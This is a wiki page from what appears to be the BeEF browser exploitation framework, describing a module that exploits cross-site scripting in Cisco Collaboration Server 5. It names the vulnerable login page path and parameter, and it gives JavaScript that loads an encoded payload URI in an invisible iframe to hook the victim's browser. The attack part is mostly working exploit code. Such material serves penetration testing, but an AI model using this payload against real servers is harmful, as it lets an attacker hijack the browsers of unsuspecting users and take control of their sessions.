-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Cisco Collaboration Server 5 XSS
Haoxi Tan edited this page Jan 9, 2020
·
2 revisions
-
Objective: hook Cisco Collaboration Server 5 using XSS
-
Authors: bcoles, s4squatch
-
Browsers: All
Use an invisible iframe to exploit XSS in Cisco Collaboration Server 5.
Vulnerable path is http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest=
var uri = beef.encode.base64.decode('<%= Base64.strict_encode64(@uri) %>');
var cisco_collaboration_iframe = beef.dom.createInvisibleIframe();
cisco_collaboration_iframe.setAttribute('src', uri);
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK